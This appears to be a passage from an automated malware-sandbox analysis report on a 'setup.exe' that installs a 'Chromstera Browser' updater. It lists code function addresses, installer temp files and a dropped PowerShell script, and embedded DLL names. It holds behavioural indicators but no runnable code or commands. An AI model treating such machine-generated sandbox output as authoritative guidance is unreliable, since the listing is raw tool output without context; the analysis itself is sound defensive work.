                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB9360 NtdllDefWindowProc_W,3_2_00BB9360
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC9430 NtdllDefWindowProc_W,3_2_00BC9430
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB6670 SysFreeString,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,SysFreeString,NtdllDefWindowProc_W,SysFreeString,3_2_00BB6670
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00C177A0 NtdllDefWindowProc_W,3_2_00C177A0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00C689B0 NtdllDefWindowProc_W,3_2_00C689B0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB9920 NtdllDefWindowProc_W,3_2_00BB9920
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB6CD0 NtdllDefWindowProc_W,3_2_00BB6CD0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB8C40 NtdllDefWindowProc_W,3_2_00BB8C40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC3E40 NtdllDefWindowProc_W,DeleteCriticalSection,3_2_00BC3E40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB5FA7 NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,3_2_00BB5FA7
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BD6FE0 NtdllDefWindowProc_W,3_2_00BD6FE0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BBFF50 NtdllDefWindowProc_W,3_2_00BBFF50
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6bc77d.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC933.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC9EF.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA7D.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICAEB.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB79.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBB9.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC46.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC66.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID04F.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID11C.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC26.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11D0.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4739.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB77.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\msiD25B.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\scrD25C.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\scrD25D.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\scrD25C.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\scrD25D.txtJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\msiD25B.txtJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\pssD27D.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\pssD27E.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SystemTemp\ProD28F.tmpJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC933.tmpJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CD3DC00_2_00CD3DC0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D260D00_2_00D260D0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BA30000_2_00BA3000
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00DA31740_2_00DA3174
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC22900_2_00BC2290
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D9830B0_2_00D9830B
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BCF4100_2_00BCF410
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC05000_2_00BC0500
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BD86300_2_00BD8630
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BA76200_2_00BA7620
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BD97100_2_00BD9710
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BCA8200_2_00BCA820
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CAA9B00_2_00CAA9B0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D8891C0_2_00D8891C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC9AD00_2_00BC9AD0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BDCBB00_2_00BDCBB0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BA5C820_2_00BA5C82
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BD0C800_2_00BD0C80
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC5CE00_2_00BC5CE0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CD1C400_2_00CD1C40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C1ADE00_2_00C1ADE0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D9CD890_2_00D9CD89
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BCCE410_2_00BCCE41
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC9FF00_2_00BC9FF0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D8FF600_2_00D8FF60
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D260D03_2_00D260D0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BA30003_2_00BA3000
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BCF4103_2_00BCF410
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC05003_2_00BC0500
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BD86303_2_00BD8630
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BA76203_2_00BA7620
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BD97103_2_00BD9710
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BCA8203_2_00BCA820
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00CAA9B03_2_00CAA9B0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC9AD03_2_00BC9AD0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BDCBB03_2_00BDCBB0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BA5C823_2_00BA5C82
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BD0C803_2_00BD0C80
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC5CE03_2_00BC5CE0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00C1ADE03_2_00C1ADE0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D9CD893_2_00D9CD89
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BCCE413_2_00BCCE41
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC9FF03_2_00BC9FF0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0010E0608_2_0010E060
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0010EF208_2_0010EF20
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0014D3B08_2_0014D3B0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0012B6E08_2_0012B6E0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0012BA808_2_0012BA80
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001760208_2_00176020
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001320608_2_00132060
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0017406E8_2_0017406E
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0017010E8_2_0017010E
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001781588_2_00178158
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001304D08_2_001304D0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001365808_2_00136580
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001088208_2_00108820
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00188AF78_2_00188AF7
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000FCBD08_2_000FCBD0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00106E108_2_00106E10
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0016B0108_2_0016B010
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0011D0B08_2_0011D0B0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0013D2E08_2_0013D2E0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000DF3408_2_000DF340
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000EB3C08_2_000EB3C0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000F74708_2_000F7470
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001834A98_2_001834A9
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0017D4DA8_2_0017D4DA
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000E3AD08_2_000E3AD0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000DFD308_2_000DFD30
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000E3D308_2_000E3D30
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0018DD708_2_0018DD70
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0016FD808_2_0016FD80
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00181EE78_2_00181EE7
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0011BF208_2_0011BF20
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C096D6016_2_00007FF77C096D60
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0EC51816_2_00007FF77C0EC518
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D0D6416_2_00007FF77C0D0D64
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0BF55816_2_00007FF77C0BF558
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0DBDCC16_2_00007FF77C0DBDCC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0965F016_2_00007FF77C0965F0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D75E016_2_00007FF77C0D75E0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E364416_2_00007FF77C0E3644
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E0EB416_2_00007FF77C0E0EB4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C06A016_2_00007FF77C0C06A0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D56CC16_2_00007FF77C0D56CC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B56F416_2_00007FF77C0B56F4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A7EE816_2_00007FF77C0A7EE8
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C371416_2_00007FF77C0C3714
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E570416_2_00007FF77C0E5704
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C097F3016_2_00007FF77C097F30
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0AA73416_2_00007FF77C0AA734
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D0F5016_2_00007FF77C0D0F50
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A276816_2_00007FF77C0A2768
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C6F8C16_2_00007FF77C0C6F8C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C09CFD016_2_00007FF77C09CFD0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E2FC416_2_00007FF77C0E2FC4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D1FB816_2_00007FF77C0D1FB8
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D2FE416_2_00007FF77C0D2FE4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E5FDC16_2_00007FF77C0E5FDC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B988816_2_00007FF77C0B9888
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A68B016_2_00007FF77C0A68B0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B809C16_2_00007FF77C0B809C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C60BC16_2_00007FF77C0C60BC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E00EC16_2_00007FF77C0E00EC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D90F816_2_00007FF77C0D90F8
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C514C16_2_00007FF77C0C514C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D113816_2_00007FF77C0D1138
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0DA96416_2_00007FF77C0DA964
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0AA15C16_2_00007FF77C0AA15C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C498016_2_00007FF77C0C4980
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A59A816_2_00007FF77C0A59A8
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D51D416_2_00007FF77C0D51D4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A49BC16_2_00007FF77C0A49BC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0BD1E816_2_00007FF77C0BD1E8
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A3A2016_2_00007FF77C0A3A20
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0AEA4C16_2_00007FF77C0AEA4C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0DBA9416_2_00007FF77C0DBA94
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0AFAD016_2_00007FF77C0AFAD0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E2B1416_2_00007FF77C0E2B14
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B431416_2_00007FF77C0B4314
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D132416_2_00007FF77C0D1324
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B0B5416_2_00007FF77C0B0B54
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D0B7C16_2_00007FF77C0D0B7C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B33A416_2_00007FF77C0B33A4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B73F416_2_00007FF77C0B73F4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0A9BF416_2_00007FF77C0A9BF4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0BC3DC16_2_00007FF77C0BC3DC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C1C4816_2_00007FF77C0C1C48
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0AA43816_2_00007FF77C0AA438
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0B1C3816_2_00007FF77C0B1C38
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0E548816_2_00007FF77C0E5488
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0BDC8016_2_00007FF77C0BDC80
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C095CA016_2_00007FF77C095CA0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0D150C16_2_00007FF77C0D150C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4756D6054_2_00007FF7A4756D60
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A479BDCC54_2_00007FF7A479BDCC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47975E054_2_00007FF7A47975E0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47565F054_2_00007FF7A47565F0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47AC51854_2_00007FF7A47AC518
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4790D6454_2_00007FF7A4790D64
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477F55854_2_00007FF7A477F558
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47806A054_2_00007FF7A47806A0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A0EB454_2_00007FF7A47A0EB4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47956CC54_2_00007FF7A47956CC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4767EE854_2_00007FF7A4767EE8
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47756F454_2_00007FF7A47756F4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A570454_2_00007FF7A47A5704
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478371454_2_00007FF7A4783714
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A364454_2_00007FF7A47A3644
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A2FC454_2_00007FF7A47A2FC4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4791FB854_2_00007FF7A4791FB8
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A475CFD054_2_00007FF7A475CFD0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4792FE454_2_00007FF7A4792FE4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A5FDC54_2_00007FF7A47A5FDC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A476A73454_2_00007FF7A476A734
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4757F3054_2_00007FF7A4757F30
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4790F5054_2_00007FF7A4790F50
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A476276854_2_00007FF7A4762768
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4786F8C54_2_00007FF7A4786F8C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477809C54_2_00007FF7A477809C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47668B054_2_00007FF7A47668B0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47860BC54_2_00007FF7A47860BC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A00EC54_2_00007FF7A47A00EC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47990F854_2_00007FF7A47990F8
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477988854_2_00007FF7A4779888
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47659A854_2_00007FF7A47659A8
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47649BC54_2_00007FF7A47649BC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47951D454_2_00007FF7A47951D4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477D1E854_2_00007FF7A477D1E8
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A479113854_2_00007FF7A4791138
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478514C54_2_00007FF7A478514C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A476A15C54_2_00007FF7A476A15C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A479A96454_2_00007FF7A479A964
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478498054_2_00007FF7A4784980
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A476FAD054_2_00007FF7A476FAD0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A2B1454_2_00007FF7A47A2B14
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477431454_2_00007FF7A4774314
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4763A2054_2_00007FF7A4763A20
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A476EA4C54_2_00007FF7A476EA4C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A479BA9454_2_00007FF7A479BA94
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47733A454_2_00007FF7A47733A4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477C3DC54_2_00007FF7A477C3DC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47773F454_2_00007FF7A47773F4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4769BF454_2_00007FF7A4769BF4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A479132454_2_00007FF7A4791324
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4770B5454_2_00007FF7A4770B54
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4790B7C54_2_00007FF7A4790B7C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4755CA054_2_00007FF7A4755CA0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A479150C54_2_00007FF7A479150C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A476A43854_2_00007FF7A476A438
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4771C3854_2_00007FF7A4771C38
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4781C4854_2_00007FF7A4781C48
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A477DC8054_2_00007FF7A477DC80
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A47A548854_2_00007FF7A47A5488
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00D7D791 appears 36 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00BA8DB0 appears 450 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00BA8300 appears 112 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00D80C10 appears 39 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00BA83A0 appears 60 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00D80118 appears 59 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00BAA830 appears 33 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00CC9050 appears 56 times
                      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00D99A1E appears 34 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 000D43D0 appears 31 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 000D3470 appears 180 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 000D2420 appears 160 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 00168350 appears 57 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 00167FE3 appears 96 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 000D35E0 appears 194 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 000D8750 appears 36 times
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: String function: 00168016 appears 67 times
                      Source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameaischeduler.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.exe
